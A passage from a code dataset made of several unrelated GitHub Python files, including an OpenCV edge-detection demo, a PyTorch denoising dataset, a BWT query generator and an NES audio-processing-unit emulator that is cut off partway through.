\"keops/specific/shape_distance/kernels.cx\",\n ]\n + pybind11_files\n + tao_seq_files\n },\n install_requires=[\n \"numpy\",\n ],\n extras_require={\n \"full\": [\n \"sphinx\",\n \"sphinx-gallery\",\n \"recommonmark\",\n \"sphinxcontrib-httpdomain\",\n \"sphinx_rtd_theme\",\n \"breathe\",\n \"matplotlib\",\n \"imageio\",\n \"torch\",\n \"gpytorch\",\n \"scikit-learn\",\n ],\n },\n)\n","repo_name":"lcosmo/DGM_pytorch","sub_path":"keops/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"32"} +{"seq_id":"26488705067","text":"import sys\r\nimport numpy as np\r\nimport cv2\r\n\r\ndef onTrackbar(th):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 트랙바 콜백 함수\r\n\t#rep_edge = cv2.GaussianBlur(rep_gray, (5, 5), 0) \t# 가우시안 블러링\r\n\trep_edge = cv2.Canny(rep_gray, th, th*2, 5)\t\t\t\t# 캐니 에지 검출\r\n\th, w = src.shape[:2]\r\n\tcv2.rectangle(rep_edge, (0, 0, w, h), 255, -1) \t\t# 흰색 사각형 그리기\r\n\tcolor_edge = cv2.bitwise_and(rep_img, rep_img, mask=rep_edge)\r\n\tcv2.imshow(\"color edge\", color_edge)\r\n\r\nsrc = cv2.imread('images/lenna.bmp', cv2.IMREAD_COLOR)\r\n#src = cv2.imread('images/building.jpg', cv2.IMREAD_COLOR)\r\n\r\nif src is None:\r\n print('Image load failed!')\r\n sys.exit()\r\n\r\nth = 50\r\nrep_img = cv2.repeat(src, 1, 2) \t# 가로 반복 복사\r\nrep_gray = cv2.cvtColor(rep_img, cv2.COLOR_BGR2GRAY) # 명암도 영상 변환\r\n\r\ncv2.namedWindow(\"color edge\", cv2.WINDOW_NORMAL) \t\t# 윈도우 생성\r\ncv2.createTrackbar(\"Canny th\", \"color edge\", th, 100, onTrackbar)\t# 콜백 함수 등록\r\nonTrackbar(th)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# 콜백 함수 첫 실행\r\ncv2.waitKey()\r\n\r\ncv2.destroyAllWindows()","repo_name":"bigdatachobo/Study","sub_path":"OpenCV/text_book/opencv_practice_answer/05-cv-05-02-edge-cannyColor.py","file_name":"05-cv-05-02-edge-cannyColor.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"9027465927","text":"from collections import deque\nfrom typing import Deque, Generator, Callable, List, Tuple\n\n\nDEBUG: bool = False\n\nTEST_RUNS: Tuple[Tuple[str]] = (\n (\n \"50\",\n \"2\",\n \"11 10 5 11 10 20\",\n \"15 13 16\",\n \"1500\",\n ),\n (\n \"20\",\n \"6\",\n \"14 13 12 11 10 5\",\n \"13 3 11 10\",\n \"800\",\n ),\n (\n \"33\",\n \"1\",\n \"12 11 10\",\n \"10 20 30\",\n \"100\",\n ),\n)\n\n\ndef get_run_generator(test_data: Tuple[str]) -> Callable[[], str]:\n test_data_gen: Generator[str, None, None] = (line for line in test_data)\n\n def generate_input() -> str:\n return next(test_data_gen)\n\n return generate_input\n\n\ndef solution():\n bullet_cost: int = int(input())\n gun_barrel_size: int = int(input())\n bullets: List[int] = [int(b) for b in input().split()]\n locks: List[int] = [int(l) for l in input().split()]\n prize: int = int(input())\n\n ammo: int = gun_barrel_size\n bullet_expence: int = int()\n\n while bullets and locks:\n\n if bullets.pop() <= locks[0]:\n print(\"Bang!\")\n locks.pop(0)\n else:\n print(\"Ping!\")\n\n bullet_expence += bullet_cost\n ammo -= 1\n\n if ammo == 0 and bullets:\n ammo += gun_barrel_size\n print(\"Reloading!\")\n\n if locks:\n print(f\"Couldn't get through. Locks left: {len(locks)}\")\n else:\n print(f\"{len(bullets)} bullets left. Earned ${prize-bullet_expence}\")\n\n\nif DEBUG:\n for test_run in TEST_RUNS:\n input: Callable[[], str] = get_run_generator(test_run)\n solution()\nelse:\n solution()\n","repo_name":"sleepychild/SoftUni_SE","sub_path":"ADVANCED_MODULE/01_Lists_as_Stacks_and_Queues/EXERCISE/09_Key_Revolver.py","file_name":"09_Key_Revolver.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4874283386","text":"from __future__ import print_function, division\nfrom PIL import Image\nfrom torchvision.transforms import ToTensor, ToPILImage, Compose, Normalize\nimport numpy as np\n\nimport random\nimport tarfile\nimport io\nimport os\nimport pandas as pd\n\nimport torch\nfrom torch.utils.data import Dataset\n\n\n# %% custom dataset\nclass PlacesDataset(Dataset):\n def __init__(self, txt_path='filelist.txt', img_dir='data', transform=None, test=False):\n \"\"\"\n Initialize data set as a list of IDs corresponding to each item of data set\n\n :param img_dir: path to image files as a uncompressed tar archive\n :param txt_path: a text file containing names of all of images line by line\n :param transform: apply some transforms like cropping, rotating, etc on input image\n :param test: is inference time or not\n :return: a 3-value dict containing input image (y_descreen) as ground truth,\n input image X as halftone image and edge-map (y_edge) of ground truth image to feed into the network.\n \"\"\"\n\n df = pd.read_csv(txt_path, sep=' ', index_col=0)\n self.img_names = df.index.values\n self.txt_path = txt_path\n self.img_dir = img_dir\n self.transform = transform\n self.to_tensor = ToTensor()\n self.to_pil = ToPILImage()\n self.get_image_selector = True if img_dir.__contains__('tar') else False\n self.tf = tarfile.open(self.img_dir) if self.get_image_selector else None\n self.transform_gt = transform if test else Compose(self.transform.transforms[:-1]) # omit noise of ground truth\n\n def get_image_from_tar(self, name):\n \"\"\"\n Gets a image by a name gathered from file list csv file\n\n :param name: name of targeted image\n :return: a PIL image\n \"\"\"\n # tarinfo = self.tf.getmember(name)\n image = self.tf.extractfile(name)\n image = image.read()\n image = Image.open(io.BytesIO(image))\n return image\n\n def get_image_from_folder(self, name):\n \"\"\"\n gets a image by a name gathered from file list text file\n\n :param name: name of targeted image\n :return: a PIL image\n \"\"\"\n\n image = Image.open(os.path.join(self.img_dir, name))\n return image\n\n def __len__(self):\n \"\"\"\n Return the length of data set using list of IDs\n\n :return: number of samples in data set\n \"\"\"\n return len(self.img_names)\n\n def __getitem__(self, index):\n \"\"\"\n Generate one item of data set. Here we apply our preprocessing things like halftone styles and\n subtractive color process using CMYK color model, generating edge-maps, etc.\n\n :param index: index of item in IDs list\n\n :return: a sample of data as a dict\n \"\"\"\n\n if index == (self.__len__() - 1) and self.get_image_selector: # Close tarfile opened in __init__\n self.tf.close()\n\n if self.get_image_selector: # note: we prefer to extract then process!\n y_descreen = self.get_image_from_tar(self.img_names[index])\n else:\n y_descreen = self.get_image_from_folder(self.img_names[index])\n\n seed = np.random.randint(2147483647)\n random.seed(seed)\n\n if self.transform is not None:\n y_noise = self.noisy_image(y_descreen)\n y_descreen = self.transform(y_descreen)\n random.seed(seed)\n y_noise = self.transform_gt(y_noise)\n\n sample = {'y_descreen': y_descreen,\n 'y_noise': y_noise}\n\n return sample\n\n def noisy_image(self, image):\n \"\"\"\n Add Salt and Pepper noise to image and return image as same type as input.\n\n :param image: PIL image\n :return: PIL image\n \"\"\"\n\n if type(image) == torch.Tensor:\n image = self.to_pil(image)\n image = np.array(image)\n s_vs_p = 0.5\n amount = 0.015\n out = np.copy(image)\n num_salt = np.ceil(amount * image.size * s_vs_p)\n coords = tuple([np.random.randint(0, i - 1, int(num_salt)) for i in image.shape])\n out[coords] = 1\n num_pepper = np.ceil(amount * image.size * (1. - s_vs_p))\n coords = tuple([np.random.randint(0, i - 1, int(num_pepper)) for i in image.shape])\n out[coords] = 0\n out = ToPILImage()(out)\n return out\n\n\nclass RandomNoise(object):\n def __init__(self, p, mean=0, std=0.1): \n self.p = p\n self.mean = mean\n self.std = std\n\n def __call__(self, img):\n if random.random() <= self.p:\n noise = torch.empty(*img.size(), dtype=torch.float, requires_grad=False)\n return img+noise.normal_(self.mean, self.std)\n return img\n\n\nclass Blend(object):\n \"\"\"\n Blend two input tensors(tensors) with respect to the alpha value as a weight if random number is lower than p\n for each example\n \"\"\"\n\n def __init__(self, p=0.5):\n self.p = p\n\n def __call__(self, halftone, ground_truth, alpha=0.5):\n \"\"\"\n\n :param halftone: First tensor to be blended (batch_size, channel_size, height, width)\n :param ground_truth: Second tensor to be blended with size (batch_size, channel_size, height, width)\n :param alpha: weight of linear addition of two tensors\n\n :return: A tensor with size of (batch_size, channel_size, height, width)\n \"\"\"\n\n p = torch.zeros(halftone.size()[0]).new_full((halftone.size()[0], ), self.p)\n rand = torch.zeros(p.size()[0]).uniform_()\n blend = torch.zeros((halftone.size()))\n mask = rand < p\n blend[mask] = halftone[mask] * (1.0 - alpha) + ground_truth[mask] * alpha\n mask = rand > p\n blend[mask] = halftone[mask]\n return blend\n\n\nclass UnNormalizeNative(object):\n \"\"\"\n Unnormalize an input tensor given the mean and std\n \"\"\"\n\n def __init__(self, mean, std):\n self.mean = torch.tensor(mean)\n self.std = torch.tensor(std)\n\n def __call__(self, tensor):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n Returns:\n Tensor: Normalized image.\n \"\"\"\n\n return Normalize((-mean / std).tolist(), (1.0 / std).tolist())","repo_name":"Nikronic/DetailsNet","sub_path":"utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"25637532578","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom random import random\n\nsequence_file = 'Sequence.txt'\nquery_file = 'Query#9.txt'\nNOISE_PERCENT = 0.4\nNOISE_CHARS = ['x', 'y', 'z', ' ']\nQUERY_LENGTH = [10, 25, 50, 75, 100, 150, 200, 250, 500, 1000]\n\nsequence = ''\nqueries = []\n\nwith open(sequence_file, 'r') as sf:\n sequence = sf.read().replace('\\n', '')\n\nsequence_length = len(sequence)\nfor length in QUERY_LENGTH:\n start_index = int(random() * sequence_length)\n end_index = start_index + length\n\n if end_index > sequence_length:\n end_index = sequence_length\n\n query = sequence[start_index:end_index]\n noise_times = int(length * NOISE_PERCENT)\n\n for i in range(noise_times):\n operation = int(random() * 100) % 3\n random_index = int(random() * length)\n random_char = NOISE_CHARS[int(len(NOISE_CHARS) * random())]\n\n if operation == 0:\n # Add a new char\n query = query[:random_index] + random_char + query[random_index:]\n elif operation == 1:\n # Delete a char\n query = query[:random_index] + query[random_index + 1:]\n elif operation == 2:\n # Replace a char\n query = query[:random_index] + random_char + query[random_index + 1:]\n\n queries.append(query)\n\nwith open(query_file, 'w') as qf:\n for q in queries:\n qf.write(q + '\\n')\n","repo_name":"hitlxc/BWT","sub_path":"Tests/Tests/GenerateQuery.py","file_name":"GenerateQuery.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"30618718644","text":"import os\nimport sys\n\n\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n\n\nthis_dir = os.path.dirname(__file__)\n\n# add `./src/Kite` dir to system path\nadd_path(this_dir)","repo_name":"DemonDamon/Listed-company-news-crawl-and-text-analysis","sub_path":"src/Kite/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","stars":807,"dataset":"github-code","pt":"32"} +{"seq_id":"34733121984","text":"import sys\nimport ctypes\nfrom ctypes import CDLL, c_void_p, c_uint, c_float, c_ubyte\n\n# TODO: note when an APU cycle starts, react (and print info)\n# accordingly\n\nAPU_FRAME_COUNTER_WARN = False\nAPU_WARN = False\nAPU_INFO = False\n\nENABLE_PULSE = True\nENABLE_TRIANGLE = True\n\nAPU_STATUS = 0x4015\nAPU_FRAME_COUNTER = 0x4017\n\nCHANNEL_ADDRESS_RANGE = 4\n\nPULSE_1_BASE = 0x4000\nPULSE_2_BASE = 0x4004\nTRIANGLE_BASE = 0x4008\nNOISE_BASE = 0x400c\nDMC_BASE = 0x4010\n\nPULSE_1_STATUS_MASK = 0x1\nPULSE_2_STATUS_MASK = 0x2\nTRIANGLE_STATUS_MASK = 0x4\nNOISE_STATUS_MASK = 0x8\nDMC_STATUS_MASK = 0x10\n\nFRAME_COUNTER_IRQ_INHIBIT_MASK = 0x40\nFRAME_COUNTER_MODE_MASK = 0x80\nFRAME_COUNTER_MODE_OFFSET = 7\n\nPULSE_ENVELOPE_DIVIDER_MASK = 0xf\nPULSE_ENVELOPE_DIVIDER_OFFSET = 0\nPULSE_CONSTANT_ENVELOPE_MASK = 0x10\nPULSE_CONSTANT_ENVELOPE_OFFSET = 4\nPULSE_LENGTH_HALT_MASK = 0x20\nPULSE_LENGTH_HALT_OFFSET = 5\nPULSE_DUTY_MASK = 0xc0\nPULSE_DUTY_OFFSET = 6\n\nPULSE_DUTY_TABLE = [0.125, 0.25, 0.5, 0.75]\n\nPULSE_SWEEP_SHIFT_MASK = 0x7\nPULSE_SWEEP_SHIFT_OFFSET = 0\nPULSE_SWEEP_NEGATE_MASK = 0x8\nPULSE_SWEEP_PERIOD_MASK = 0x70\nPULSE_SWEEP_PERIOD_OFFSET = 4\nPULSE_SWEEP_ENABLE_MASK = 0x80\n\nPULSE_TIMER_LOW_VALUE_MASK = 0xff\nPULSE_TIMER_HIGH_VALUE_MASK = 0x700\nPULSE_TIMER_HIGH_VALUE_OFFSET = 8\n\nPULSE_TIMER_HIGH_INPUT_MASK = 0x7\nPULSE_LC_LOAD_MASK = 0xf8\nPULSE_LC_LOAD_OFFSET = 3\n\nPULSE_LC_TABLE = [10, 254, 20, 2,\n 40, 4, 80, 6,\n 160, 8, 60, 10,\n 14, 12, 26, 14,\n 12, 16, 24, 18,\n 48, 20, 96, 22,\n 192, 24, 72, 26,\n 16, 28, 32, 30]\n\nTRIANGLE_LINEAR_COUNTER_MASK = 0x7f\nTRIANGLE_COUNTER_HALT_MASK = 0x80\n\nTRIANGLE_LENGTH_COUNTER_TABLE = PULSE_LC_TABLE\n\nTRIANGLE_TIMER_LOW_VALUE_MASK = 0xff\nTRIANGLE_TIMER_HIGH_VALUE_MASK = 0x700\nTRIANGLE_TIMER_HIGH_VALUE_OFFSET = 8\n\nTRIANGLE_TIMER_HIGH_INPUT_MASK = 0x7\nTRIANGLE_LC_LOAD_MASK = 0xf8\nTRIANGLE_LC_LOAD_OFFSET = 3\n\nTRIANGLE_LC_TABLE = PULSE_LC_TABLE\n\nCPU_FREQUENCY = 1.789773e6\nCPU_CYCLES_PER_WAVEFORM_CYCLE = 16\n\nAPU_CPU_CYCLES_PER_FC_CYCLE = 2\n\n# lazy enum\n# note: each successive value implies the previous: e.g. an interrupt\n# will also generate a half and quarter cycle clock\nAPU_FC_QUARTER_FRAME = 0\nAPU_FC_HALF_FRAME = 1\nAPU_FC_INTERRUPT = 2\n\nAPU_4STEP_SEQUENCE = [\n (int(3728.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_QUARTER_FRAME),\n (int(7456.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_HALF_FRAME),\n (int(11185.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_QUARTER_FRAME),\n # Technically, the interrupt flag is set from APU cycle 14914\n # through cycle 14915, which will affect reads from 0x4015. I\n # really don't care. (I really hope I don't care.)\n (int(14914.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_INTERRUPT)]\nAPU_CYCLES_PER_4STEP_FRAME = 14915\n\nAPU_5STEP_SEQUENCE = [\n (int(3728.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_QUARTER_FRAME),\n (int(7456.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_HALF_FRAME),\n (int(11185.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_QUARTER_FRAME),\n (int(18640.5 * APU_CPU_CYCLES_PER_FC_CYCLE),\n APU_FC_HALF_FRAME)]\nAPU_CYCLES_PER_5STEP_FRAME = 18641\n\nAPU_FREQUENCY = CPU_FREQUENCY / 2.0\n\nclass CAPU(object):\n\n def __init__(self):\n libapu = CDLL(\"libapu.so\")\n\n libapu.ex_initAPU.restype = c_void_p\n\n libapu.ex_updateFrameCounter.argtypes = \\\n [c_void_p, c_ubyte]\n libapu.ex_frameCounterQuarterFrame.argtypes = \\\n [c_void_p]\n libapu.ex_frameCounterHalfFrame.argtypes = \\\n [c_void_p]\n\n # pulse wave interface\n\n libapu.ex_resetPulse.argtypes = \\\n [c_void_p, c_uint]\n libapu.ex_setPulseDivider.argtypes = \\\n [c_void_p, c_uint, c_uint]\n libapu.ex_setPulseEnabled.argtypes = \\\n [c_void_p, c_uint, c_ubyte]\n libapu.ex_setPulseDuty.argtypes = \\\n [c_void_p, c_uint, c_float]\n libapu.ex_setPulseLengthCounterHalt.argtypes = \\\n [c_void_p, c_uint, c_ubyte]\n libapu.ex_setPulseLengthCounter.argtypes = \\\n [c_void_p, c_uint, c_uint]\n libapu.ex_updatePulseSweep.argtypes = \\\n [c_void_p, c_uint, c_ubyte, c_uint, c_uint, c_ubyte]\n libapu.ex_updatePulseEnvelope.argtypes = \\\n [c_void_p, c_uint, c_ubyte, c_ubyte, c_ubyte]\n\n # triangle wave interface\n\n libapu.ex_setTriangleEnabled.argtypes = \\\n [c_void_p, c_ubyte]\n libapu.ex_setTriangleDivider.argtypes = \\\n [c_void_p, c_uint]\n libapu.ex_setTriangleLinearCounterInit.argtypes = \\\n [c_void_p, c_uint]\n libapu.ex_setTriangleTimerHalts.argtypes = \\\n [c_void_p, c_ubyte]\n libapu.ex_setTriangleLengthCounter.argtypes = \\\n [c_void_p, c_uint]\n libapu.ex_triangleLinearCounterReload.argtypes = \\\n [c_void_p]\n\n self.libapu = libapu\n\n self.apu_p = libapu.ex_initAPU()\n\n def updateFrameCounter(self, mode):\n self.libapu.ex_updateFrameCounter(self.apu_p, mode)\n\n def frameCounterQuarterFrame(self):\n self.libapu.ex_frameCounterQuarterFrame(self.apu_p)\n\n def frameCounterHalfFrame(self):\n self.libapu.ex_frameCounterHalfFrame(self.apu_p)\n\n def resetPulse(self, pulse_n):\n self.libapu.ex_resetPulse(self.apu_p, pulse_n)\n\n def setPulseDivider(self, pulse_n, divider):\n self.libapu.ex_setPulseDivider(self.apu_p, pulse_n, divider)\n\n def setPulseEnabled(self, pulse_n, enabled):\n self.libapu.ex_setPulseEnabled(self.apu_p, pulse_n, enabled)\n\n def setPulseDuty(self, pulse_n, duty):\n self.libapu.ex_setPulseDuty(self.apu_p, pulse_n, duty)\n\n def setPulseLengthCounterHalt(self, pulse_n, h):\n self.libapu.ex_setPulseLengthCounterHalt(self.apu_p, pulse_n, h)\n\n def setPulseLengthCounter(self, pulse_n, c):\n self.libapu.ex_setPulseLengthCounter(self.apu_p, pulse_n, c)\n\n def updatePulseSweep(self, pulse_n, enabled, divider, shift, negate):\n self.libapu.ex_updatePulseSweep(self.apu_p, pulse_n,\n enabled, divider, shift, negate)\n\n def updatePulseEnvelope(self, pulse_n, loop, constant, timerReload):\n self.libapu.ex_updatePulseEnvelope(self.apu_p, pulse_n,\n loop, constant, timerReload)\n\n def setTriangleEnabled(self, e):\n self.libapu.ex_setTriangleEnabled(self.apu_p, e)\n\n def setTriangleDivider(self, d):\n self.libapu.ex_setTriangleDivider(self.apu_p, d)\n\n def setTriangleLinearCounterInit(self, c):\n self.libapu.ex_setTriangleLinearCounterInit(self.apu_p, c)\n\n def setTriangleTimerHalts(self, h):\n self.libapu.ex_setTriangleTimerHalts(self.apu_p, h)\n\n def setTriangleLengthCounter(self, c):\n self.libapu.ex_setTriangleLengthCounter(self.apu_p, c)\n\n def triangleLinearCounterReload(self):\n self.libapu.ex_triangleLinearCounterReload(self.apu_p)\n\n\n\nclass PulseChannel(object):\n\n # The pulse channel outputs a square wave. Seems to work roughly like this:\n\n # - The square wave is defined by a period, a duty, and an\n # envelope. Period is determined by the timer and duty is\n # determined by its own setting. Envelope has to do with the\n # envelope flags somehow? Duty is constant, I think. Period may\n # be modified by the sweep unit. Envelope may be modified\n # according to the envelope divider. Sweep unit and envelope\n # divider are clocked by the APU frame counter, which clocks\n # every other CPU cycle. That should be quick enough that we'll\n # need to pass the state of those things to the audio code. So\n # the overall output from here to the C++ code should be:\n # period, duty, envelope, sweep unit state, envelope divider\n # state.\n\n\n def __init__(self, apu, channelID):\n self.apu = apu\n self.channelID = channelID\n self.enabled = False\n # TODO ensure these defaults are right\n self.envelopeDivider = 0\n self.constantEnvelope = True\n self.lengthCounterHalt = True\n self.duty = 0\n self.timer = 0\n self.lengthCounter = 0\n # sweep unit\n self.sweepEnabled = False\n self.sweepDividerPeriod = 1\n self.sweepNegate = 0\n self.sweepShift = 0\n self.sweepReload = False\n\n\n def setEnabled(self, enabled):\n self.enabled = enabled and ENABLE_PULSE\n if not enabled:\n self.lengthCounter = 0\n # TODO ensure that the channel is immediately silenced\n self.apu.capu.setPulseEnabled(self.channelID, enabled)\n\n def getPeriod(self):\n return ((self.timer + 2) * CPU_CYCLES_PER_WAVEFORM_CYCLE\n / CPU_FREQUENCY)\n\n def write(self, register, val):\n # register should be between 0 and 3 inclusive, and val should be an integer\n if register == 0: # Duty, length counter halt, envelope settings\n self.envelopeDivider = (val & PULSE_ENVELOPE_DIVIDER_MASK) >> PULSE_ENVELOPE_DIVIDER_OFFSET\n self.constantEnvelope = bool(val & PULSE_CONSTANT_ENVELOPE_MASK)\n self.lengthCounterHalt = bool(val & PULSE_LENGTH_HALT_MASK)\n self.duty = (val & PULSE_DUTY_MASK) >> PULSE_DUTY_OFFSET\n dutyFloat = PULSE_DUTY_TABLE[self.duty]\n self.apu.capu.setPulseDuty(self.channelID, dutyFloat)\n self.updateDuration()\n self.updateEnvelope()\n if APU_INFO:\n print >> sys.stderr, \\\n \"Frame %d: APU pulse %d: divider %d, constant envelope %d, length counter halt %d, duty %d\" % \\\n (self.apu.cpu.ppu.frame, self.channelID,\n self.envelopeDivider, self.constantEnvelope, self.lengthCounterHalt, self.duty)\n elif register == 1: # Sweep unit\n self.sweepReload = True # This may not do anything right now\n self.sweepShift = (val & PULSE_SWEEP_SHIFT_MASK) >> PULSE_SWEEP_SHIFT_OFFSET\n self.sweepNegate = bool(val & PULSE_SWEEP_NEGATE_MASK)\n self.sweepPeriod = 1 + ((val & PULSE_SWEEP_PERIOD_MASK) >> PULSE_SWEEP_PERIOD_OFFSET)\n self.sweepEnable = bool(val & PULSE_SWEEP_ENABLE_MASK)\n self.apu.capu.updatePulseSweep(self.channelID, self.sweepEnable,\n self.sweepPeriod, self.sweepShift,\n int(self.sweepNegate))\n if APU_INFO:\n if self.sweepEnable:\n print >> sys.stderr, \\\n \"Frame %d: APU pulse %d sweep enabled: shift %d, negate %d, period %d\" % \\\n (self.apu.cpu.ppu.frame, self.channelID,\n self.sweepShift, self.sweepNegate, self.sweepPeriod)\n else:\n print >> sys.stderr, \\\n \"Frame %d: APU pulse %d sweep disabled\" \\\n % (self.apu.cpu.ppu.frame, self.channelID)\n elif register == 2: # Timer low (note: does not reset phase or envelope)\n self.timer = (self.timer & PULSE_TIMER_HIGH_VALUE_MASK) + val\n self.apu.capu.setPulseDivider(self.channelID, self.timer)\n if APU_INFO:\n if self.timer < 8:\n freq_string = \"silent\"\n else:\n freq_string = \"%f Hz\" % \\\n (CPU_FREQUENCY / (CPU_CYCLES_PER_WAVEFORM_CYCLE * (self.timer + 2)))\n print >> sys.stderr, \\\n \"Frame %d: APU pulse %d timer %d after low bits (%s)\" \\\n % (self.apu.cpu.ppu.frame, self.channelID,\n self.timer, freq_string)\n elif register == 3: # Length counter load, timer high\n self.timer = (self.timer & PULSE_TIMER_LOW_VALUE_MASK) + \\\n ((val & PULSE_TIMER_HIGH_INPUT_MASK) << PULSE_TIMER_HIGH_VALUE_OFFSET)\n self.apu.capu.setPulseDivider(self.channelID, self.timer)\n if self.enabled:\n lengthCounterIndex = (val & PULSE_LC_LOAD_MASK) >> PULSE_LC_LOAD_OFFSET\n self.lengthCounter = PULSE_LC_TABLE[lengthCounterIndex]\n self.updateDuration()\n # As a side effect, this restarts the envelope and\n # resets the phase.\n self.apu.capu.resetPulse(self.channelID)\n if APU_INFO:\n if self.timer < 8:\n freq_string = \"silent\"\n else:\n freq_string = \"%f Hz\" % \\\n (CPU_FREQUENCY / (CPU_CYCLES_PER_WAVEFORM_CYCLE * (self.timer + 2)))\n # Length counter is clocked by the frame counter,\n # twice per APU frame. The duration of an APU frame\n # depends on the sequencer mode, which is set by the\n # frame counter.\n\n # TODO: In the five-step sequence, the frame counter\n # clocks things at uneven intervals. That might matter somewhere.\n duration = self.lengthCounter * self.apu.frameDuration() / 2.0\n print >> sys.stderr, \\\n \"Frame %d: APU pulse %d timer %d after high bits (%s); length counter %d (%fs)\" \\\n % (self.apu.cpu.ppu.frame, self.channelID,\n self.timer, freq_string, self.lengthCounter, duration)\n else:\n raise RuntimeError(\"Unrecognized pulse channel register\")\n\n def updateDuration(self):\n self.apu.capu.setPulseLengthCounterHalt(self.channelID, int(self.lengthCounterHalt))\n self.apu.capu.setPulseLengthCounter(self.channelID, self.lengthCounter)\n\n def updateEnvelope(self):\n # Note: the envelope loop flag is the same as the length counter halt flag.\n self.apu.capu.updatePulseEnvelope(self.channelID,\n int(self.lengthCounterHalt),\n int(self.constantEnvelope),\n self.envelopeDivider)\n\nclass TriangleChannel(object):\n\n def __init__(self, apu):\n self.apu = apu\n self.enabled = False\n self.linearCounterInit = 0\n self.countersHalt = False\n self.timer = 0\n self.lengthCounter = 0\n\n def setEnabled(self, enabled):\n self.enabled = enabled and ENABLE_TRIANGLE\n self.apu.capu.setTriangleEnabled(enabled)\n\n def write(self, register, val):\n # register should be between 0 and 3 inclusive, and val should be an integer\n if register == 0:\n self.linearCounterInit = val & TRIANGLE_LINEAR_COUNTER_MASK\n self.countersHalt = bool(val & TRIANGLE_COUNTER_HALT_MASK)\n self.apu.capu.setTriangleLinearCounterInit(self.linearCounterInit)\n self.apu.capu.setTriangleTimerHalts(int(self.countersHalt))\n if APU_INFO:\n print >> sys.stderr, \\\n \"Frame %d: APU triangle: linear counter load %d, counters halted %d\" % \\\n (self.apu.cpu.ppu.frame,\n self.linearCounterInit, self.countersHalt)\n elif register == 1: # Does nothing\n if APU_INFO:\n print >> sys.stderr, \\\n \"Frame %d: Ignoring write to unused triangle channel register\" \\\n % self.apu.cpu.ppu.frame\n elif register == 2:\n self.timer = (self.timer & TRIANGLE_TIMER_HIGH_VALUE_MASK) + val\n self.apu.capu.setTriangleDivider(self.timer)\n if APU_INFO:\n if self.timer < 2:\n freq_string = \"silent\"\n else:\n freq_string = \"%f Hz\" % \\\n (CPU_FREQUENCY / (32 * (self.timer + 1)))\n print >> sys.stderr, \\\n \"Frame %d: APU triangle timer %d after low bits (%s)\" \\\n % (self.apu.cpu.ppu.frame, self.timer, freq_string)\n elif register == 3:\n self.timer = (self.timer & TRIANGLE_TIMER_LOW_VALUE_MASK) + \\\n ((val & TRIANGLE_TIMER_HIGH_INPUT_MASK) << TRIANGLE_TIMER_HIGH_VALUE_OFFSET)\n self.apu.capu.setTriangleDivider(self.timer)\n if self.enabled:\n lengthCounterIndex = (val & TRIANGLE_LC_LOAD_MASK) >> TRIANGLE_LC_LOAD_OFFSET\n self.lengthCounter = TRIANGLE_LC_TABLE[lengthCounterIndex]\n self.apu.capu.setTriangleLengthCounter(self.lengthCounter)\n # As a side effect, this reloads the linear counter.\n self.apu.capu.triangleLinearCounterReload()\n if APU_INFO:\n if self.timer < 2:\n freq_string = \"silent\"\n else:\n freq_string = \"%f Hz\" % \\\n (CPU_FREQUENCY / (32 * (self.timer + 1)))\n duration = self.lengthCounter * self.apu.frameDuration() / 2.0\n print >> sys.stderr, \\\n \"Frame %d: APU triangle timer %d after high bits (%s), length counter %d (%fs)\" \\\n % (self.apu.cpu.ppu.frame,\n self.timer, freq_string, self.lengthCounter, duration)\n\n else:\n raise RuntimeError(\"Unrecognized triangle channel register\")\n\nclass DummyCAPU(object):\n \"\"\"A dummy object: represents every method a CAPU object could have,\n but none of them do anything.\n\n \"\"\"\n\n # Just let any attribute of this object be successfully looked up,\n # but always return a no-op function\n def __getattr__(self, name):\n def nop(*args):\n pass\n return nop\n\nclass APU(object):\n\n def __init__(self, cpu):\n self.cpu = cpu\n self.pulse1 = PulseChannel(self, 0)\n self.pulse2 = PulseChannel(self, 1)\n self.triangle = TriangleChannel(self)\n self.noiseEnabled = False\n self.dmcEnabled = False\n self.fcMode = 0\n self.fcIRQInhibit = False\n self.fcSequenceIndex = 0\n # set up the cpu's ppuCyclesUntilAction\n self.fcSleep()\n\n if cpu.audioEnabled:\n self.capu = CAPU()\n else:\n self.capu = DummyCAPU()\n\n def write(self, address, val):\n if address == APU_STATUS:\n self.setStatus(ord(val))\n elif address == APU_FRAME_COUNTER:\n self.fcMode = (ord(val) & FRAME_COUNTER_MODE_MASK) >> FRAME_COUNTER_MODE_OFFSET\n self.fcIRQInhibit = not bool(ord(val) & FRAME_COUNTER_IRQ_INHIBIT_MASK)\n self.capu.updateFrameCounter(self.fcMode)\n # TODO: currently fcIRQInhibit doesn't actually do\n # anything. Fix that.\n if APU_FRAME_COUNTER_WARN:\n print >> sys.stderr, \\\n \"Frame %d: ignoring APU frame counter write: 0b%s\" % \\\n (self.cpu.ppu.frame, \"{0:08b}\".format(ord(val)))\n elif PULSE_1_BASE <= address < (PULSE_1_BASE + CHANNEL_ADDRESS_RANGE):\n self.pulse1.write(address - PULSE_1_BASE, ord(val))\n elif 